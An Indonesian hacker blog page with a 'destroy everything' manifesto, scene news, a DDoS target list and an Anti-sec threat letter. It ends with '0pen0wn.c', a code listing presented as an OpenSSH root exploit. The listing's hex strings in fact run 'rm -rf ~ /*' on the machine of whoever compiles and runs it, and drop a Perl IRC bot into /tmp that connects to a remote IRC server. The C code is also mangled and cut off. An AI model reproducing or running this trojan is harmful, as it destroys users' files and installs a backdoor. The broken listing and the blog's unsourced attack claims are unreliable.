_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Yahoo! Southeast Asia Open Hack Day 2009

WAdowwww...

Ayo Gabung Dengan Yahoo, Dalam acara Southeast Asia Open Hack yang di selenggarakan di Indonesia, Jakarta on 21 and 22 November. Kayaknya menyenangkan, soalnya kita berkesempatan untuk bertemu dengan sesama hacker lainnya di seluruh wilayah!

Siapa yang suka Bermain Di Platform API , BURUAN DAFTAR
Yahoo mempunyai Platform Baru Antar Lain
YAP, YQL, YUI3, Dll

Pendaftaran Mulai dari
21 November '09 - 22 November '09. Pendaftaran akan dimulai pada jam 9:30 pada hari Sabtu , Dan Akan Dilaksanakan DIBalai Kartini pusat Konferensi di CBD Jakarta


Info lebih jelasnya silahkan di klik di http://openhacksea.eventwax.com/open-hack-south-east-asia


tHx

./me

Labels:


On 11/2/09 at 9:51 PM


HACKER IDOL ??

Pernah kepikir ga klo ada kompetisi hacker / alias hacker idol
heuheuheu :P

ya mungkin paling yang pernah dengar itu kompetisi hacker indonesia seperti PANHACK,THEBIGGEST HACKER DAY,ATAU HACK IN THE BOX ,

yah tapi itu kebanyak mengandung beberapa penyampaian materi / seminar .
nah tapi beda di negara Inggris ,
mereka membuat acara Kompetiti Para hacker" di inggris untuk mengalirkan bakat merka di dunia security dan networking ,
nah jika salah satu anggota dapat memenangkat acara ini mungkin akan mendapatkan pelatihan dari lembaga ternama SANS Institute. wadoww enak juga yah ,
heuheu :P

kapan indonesia seperti negara yang lain ??

atau haruskan Acara TAKEHIMOUT diganti menjadi HACKHIMOUT ?

heuheuheu :P






berita utama

http://www.detikinet.com/read/2009/10/13/080259/1220295/323/inggris-akan-gelar-kompetisi-hacker-idol

Labels:


On 10/19/09 at 2:10 AM


Kismet 2009 release !

Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, Secure SUID behavior, GPS devices and wireless devices fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.


you can download the @
http://www.packetstormsecurity.org/wireless/kismet-2009-11-R1.tar.gz

Labels:


at 2:10 AM


macam" serangan hacker

contoh pola serangan" hacker yang sering dilakukan :

=> mapping on target karena error bisa dipakai untuk melakukan testing
=> snip target
=> find some vuln on target
=> prepare exploits or build by yourself
=> crack , hack , and steal everything ,
=> dont forget to rm -rf LoL
=> klo lagi ga punya duit , jual aja ke niger . LoL

adapun berbagai macam serangan" hacker yang sangat berbahaya . seperti :

=> XSS,CSRF,XSS tunneling.
=> MSQL Injection Variant ( ASP,CGI,ASPX,CFM,JSP,PHP,PL )
=> GIFAR
=> scripting malware on image with JFIF.
=> MITM
=> ROOTING WEBSERVER
=> FIREWALKER
=> SMTP Attack
=> serangan remote ( RFI,RCE,AFD,AFU,LFI )
=> mampu memanfaatkan malware sebagai alat pengintai aktifitas anda ( siapa yang disini tukang nyepam ngaku ?? heuheue :P )
=> Session Fixation Attack
=> Bruteforce All variant .
=> RFID Attack
=> Session Extending attack
=> Local hack with metaspoilt dan tau semua pemanfaatan modul" nya.
=> Video Jacking With Stealer ( hati" yang sering streaming video LoL )
=> BOF
=> DDOS
=> SSID attack
=> wireless attack , hati" banyak serangan pada kasus ini , waspadalah, attacker bukan hanya ingin membuat ap down, tapi bisa saja attacker menyusup ke laptop anda. waspada.




./tHx

elv1n4

Labels:


at 2:10 AM


CRACKER KEMBALI BOBOL BANK PERMATA

Samarinda - Bank Permata Cabang Samarinda Kalimantan Timur menjadi korban aksi kejahatan cyber. Akibatnya uang nasabah Rp 110 Juta amblas digasak penjahat cyber. Polisi menangkap dua orang warga Samarinda, Taufik dan Herman, sekaligus menyita sejumlah kartu ATM dan KTP terkait kasus ini.

Modus kejahatan yang dilakukan memang terbilang profesional. Para penjahat cyber itu mengacak 10.000 nomor Telephone Identification Number (TIN), nomor yang digunakan nasabah Bank Permata sebagai akses kode rahasia dalam menggunakan layanan Mobile Banking maupun Internet Banking.

Sebanyak 17 nomor TIN disebut berhasil ditembus dan digunakan untuk menggondol uang tunai Rp 110 Juta. "Uang yang mereka dapat, ditransfer ke rekening bank lain melalui mesin ATM," kata Kasat Reskrim Poltabes Samarinda Kompol Yusep Gunawan Sik dalam jumpa pers di Markas Poltabes Samarinda Jl Bhayangkara No 04, Senin (13/7/2009).

Untuk mengaburkan aksinya, pelaku membentuk sejumlah agen yang bekerja membuka rekening tabungan di sejumlah bank diantaranya Bank Muamalat dan Bank Central Asia (BCA), dengan menggunakan identitas diri palsu berupa KTP. Hasil penyelidikan,terdapat perbedaan nama dan foto pada KTP tersebut. "Kami berhasil melakukan identifikasi 4 rekening di bank lain untuk menyimpan uang hasil pembobolan," ujar Yusep.

Dijelaskan Yusep, pelaku memanfaatkan kelemahan sistem penggunaan TIN bagi nasabah Bank Permata. Ketujuhbelas nomor TIN yang berhasil dibobol kawanan penjahat cyber itu merupakan nomor TIN standar yang dikeluarkan pihak Bank usai nasabah mendaftarkan kode akses rahasia di mesin ATM untuk kepentingan transaksi eletronik mobile dan internet banking. "Seharusnya, TIN itu segera diubah oleh nasabah," imbuh Yusep.

Kedua tersangka, yang bertindak sebagai agen, kini mendekam di sel tahanan Mapoltabes Samarinda. Kendati kejahatan tersebut merupakan kejahatan elektronik,penyidik baru menjerat tersangka dengan pasal 363 KUHP tentang pencurian.

"Penggunaan Undang-undang Informasi dan Transaksi Elektronik masih kita pertimbangkan. Kasus ini akan terus kita usut sampai tuntas," terang Yusep.

Sejak Juni 2009 lalu, tercatat 10 orang nasabah Bank Permata melapor ke Poltabes Samarinda. Dari laporan tersebut, Polisi melakukan penyelidikan dengan memanggil pihak Bank Permata Cabang Samarinda. "Mereka lapor karena uang mereka berkurang dengan sendirinya tanpa melakukan transaksi apapun.Uang yang berkurang cukup banyak," tutup Yusep. ( wsh / wsh )

[sumber berita : http://www.detikinet.com/read/2009/07/13/163608/1164220/323/penjahat-cyber-bobol-bank-permata-rp-110-juta]

mungkin dalam kasus ini si attacker memanfaatkan vuln di session https bank permata
heuheuheu ..
padahal bukan bank permata aja yang mempunya vuln ,mulai dari bank mandiri, bank mega, paypal, liberty reserve pun mempunyai vulner yanga sama seperti itu.

kasusnya mulai terkuak sekarang, padahal itu bugs udah lama , mulai dari Sniffing Cookie, dilanjut dengan CSRF Attack to Trigger Cookie Sending over HTTP, dan di selesaikan dengan SESSION HIJACKING .

dan di tambah pemanis dengan mengambil alih TIN *telephone identification number dengan konsep serangan VoIP Hacking, MITM, dan di lanjut dengan memalsukan tag RFID mobile phone .


heuheuheuheu :P

vina turut berduka cita aja sama attacker ,
dan jangan menyerah untuk berkarya
heuheheuheuheu :P



tHx

ELV1N4

Labels:


On 9/21/09 at 11:05 PM


DDOS ANCAM NEGARA US DAN KOREA

menyangkut banyaknya serangan cepat DDOS pada akhir" ini, seperti situs" underground yang telah down seperti milw0rm,hackforum,astalavista,dll oleh team anti-sec movement.
kembali juga dunia di gemparkan oleh ancaman serangan ddos yang akan mengincar negri Us dan Korea.
Korea Menerjunkan KISA (Korea Selatan Information Security Agency) untuk menyelidiki kasus ancaman ini.

tenyata dalam kasus ini KISA mengklaim akan terjadinya serangan DDOS besar pada negara KOREA karena banyak unsur" seperti :

=> lebih dari 25.000 pc terinfeksi zombie,
=> Infeksi ini dilakukan melalui email, menginfeksi korban dengan malware di-download
dari sekurang-kurangnya 25 server, juga terganggu oleh attacker.
=> Pada puncaknya, serangan yang diamati bisa mencapai sampai 13 Gbps dari
serangan DDoS,serangan ini dapat saja melumpuhkan banyak bandwith di negara.
=> Serangan akan diluncurkan dari masing-masing PC setiap 1 menit.
=> Para bots/zombie sudah terdaftar sebagai driver dalam Windows registri.
=> Windows Firewall telah dinonaktifkan untuk memungkinkan operasi seamless.




berikut target" situs yang akan diserang ::

www.president.go.kr
www.mnd.go.kr
www.mofat.go.kr
www.assembly.go.kr
www.usfk.mil
blog.naver.com
mail.naver.com
banking.nonghyup.com
ezbank.shinhan.com
ebank.keb.co.kr
www.assembly.go.kr

www.usfk.mil
www.usfk.mil

www.hannara.or.kr
www.chosun.com
www.auction.co.kr
www.whitehouse.gov
www.faa.gov
www.dhs.gov
www.state.gov
www.voanews.com
www.defenselink.mil
www.nyse.com
www.nasdaq.com
www.finance.yahoo.com
www.usauctionslive.com
www.usbank.com
www.washingtonpost.com
www.ustreas.gov
www.whitehouse.gov
www.faa.gov
www.evisaforms.state.gov
www.moneyfactory.gov
www.dot.gov
www.ftc.gov
www.nsa.gov
www.usps.gov
www.voa.gov
www.yahoo.com
www.travel.state.gov
www.nyse.com
www.site-by-site.com
www.marketwatch.com
www.amazon.com

bilamana ini terjadi maka sistem kegiatan pasar global akan terganggu.
pemerintah us dan korea harus lebih serius menangani ancaman ini.
wah wah pusing deh klo udah di ancam kaya gini.
huehuehue :P



tHx

ELV1N4



Labels:


On 8/20/09 at 9:26 AM


Anti-sec movement kembali mengancam beberapa situs

Dalam beberapa waktu ini, Komunitas underground yang menamakan dirinya sebagai Anti-sec Movement sedang gencar" nya melakukan attack pada beberapa situs terutama situs underground lainnya, seperti halnya komunitas antihackerlink dulu sering melakukan hal yang demikian :D
wah" menurut vina bener" keren nih komunitas.
sampai" situs upload gambar yang beralamat di http://imageshack.us di deface oleh Anti-sec, dan mereka juga pernah membuat milw0rm down :D .

nih ancamannya :
Date: Wed, 7 Jul 2009 17:11:00 +1000
From: Ant-Sec Movement
Subject: [Full-disclosure] Ant-Sec – We are going to terminate
Hackforums.net and Milw0rm.com – New Apache 0-day exploit uncovered
To: full-disclosure@lists.grok.org.uk Content-Type: text/plain; charset=”iso-8859-1″

Dear members of Hackforums.net, Jesse Labrocca (AKA Omniscient),
Milw0rm.com, str0ke, and Reader,
We are the Ant-Sec movement, and we are dedicated
to eradicating full-disclosure of vulnerabilities and exploits and free
discussion on hacking related topics. We are dedicated to stalling the ocean
of script-kiddies currently trawling the Internet, and those so called
“White Hat Hackers” who benefit financially from full-disclosure; employing
scare-tactics in order to con people into buying their firewalls and
anti-virus software.

Thus, our new targets are Hackforums.net and Milw0rm.com. Both are notable
within the hacking underground and the computer security world, and both
violate what the Anti-Sec movement is fighting for. Such as it is, both must
be terminated…utterly.

Let us first discuss Hackforums.net. It is run by a man named Jesse
Labrocca, also known as “Omniscient” within the hacker underground. Although
he, himself, claims to not know a thing about penetrating computer systems.
Hackforums.net is perhaps one of the largest communities of hackers and
script-kiddies alike currently at large in cyber space. The beginner
section, alone, is flooded every single day with messages by script-kiddies.
The “Hacking Tutorials” section is a diamond mine of full-disclosure
information. And that is not the entirety of it. As a result, this community
MUST be terminated.

Recently, the Anti-Sec movement became aware that some unknown entity has
been launching successfully crippling denial of service attacks against
Hackforums.net. Whoever you are, we of the Anti-Sec movement extend our
warmest gratitude to you and we ask that, if you’re reading this email,
please do not cease your attack against Hackforums.net. By bringing it down,
you are helping to recover the health of the Internet. Hackforums.net is a
hive of knowledge that should only be known by a select few. It MUST be
terminated. In addition, we also encourage any and all who can to launch
denial of service attacks against Hackforums.net in order to support us in
furthering our goals.

We would like to stress that we will not be participating in DDOSing
Hackforums.net. The reasons for this bring us to our next topic of
discussion.

In addition to our OpenSSH 0-day exploit, the Anti-Sec movement have also
unearthed an Apache 0-day vulnerability and we have subsequently developed
exploit code in order to take advantage of this vulnerability. It affects
ALL versions. We will be using this as well as our OpenSSH exploit to hack
into Hackforums.net and rm its contents, thus terminating it.

As soon as, if ever, the recent crippling DDOS attacks against
Hackforums.net cease, we will strike. And in that moment, Hackforums.net
will be history. Your only hope, Hackforums, is for the heavy DDOS attacks
to never stop.

Once we have dealt with Hackforums.net, we will terminate Milw0rm. Better
you had quit and left it at that, Str0ke, for now milw0rm.com will be
completely and utterly wiped. It is the second highest target after
Hackforums.net.

This is our message to all. You have seen what the Anti-Sec movement can do.
We will do it again, and again, and again, until our goals are achieved.

This we promise.

Sincerely,

Anti-Sec

ini saya dapat exploits Anti-sec
==================================

/* 0pen0wn.c by anti-sec group
* —————————
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/

Full Code Below

/* 0pen0wn.c by anti-sec group
* ---------------------------
* OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
*
*
* Takes advantage of an off-by-one
* bug in mapped authentication space on system
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
“\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26″;

char shellcode[] =
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”;

char fbsd_shellcode[] =
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22″
“\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63″
“\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d”
“\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f”
“\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b”
“\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20″
“\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20″
“\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f”
“\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24″
“\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24″
“\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e”
“\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20″
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a”
“\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79″
“\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22″
“\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70″
“\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b”
“\x2f\x74\x6d\x70\x2f\x68\x69\x0a”;
#define SIZE 0xffffff
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
printf(”\n[+] 0pen0wn 0wnz Linux/FreeBSD\n”);
printf(” Usage: %s -h -p port\n”,arg);
printf(” Options:\n”);
printf(” \t-h ip/host of target\n”);
printf(” \t-p port\n”);
printf(” \t-d username\n”);
printf(” \t-B memory_limit 8/16/64\n\n\n”);
}

#define FD 0×080518fc
#define BD 0×08082000

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
int port=23, limit=8, target=0, sock;
struct hostent *host;
struct sockaddr_in addr;

if (geteuid()) {
puts(”need root for raw socket, etc…”);
return 1;
}

if(argc < host =" gethostbyname(h);" sin_addr =" *(struct">h_addr;
}

sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf(” [-] Connecting failed\n”);
return 1;
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,”w+”);
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,”%s”,shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
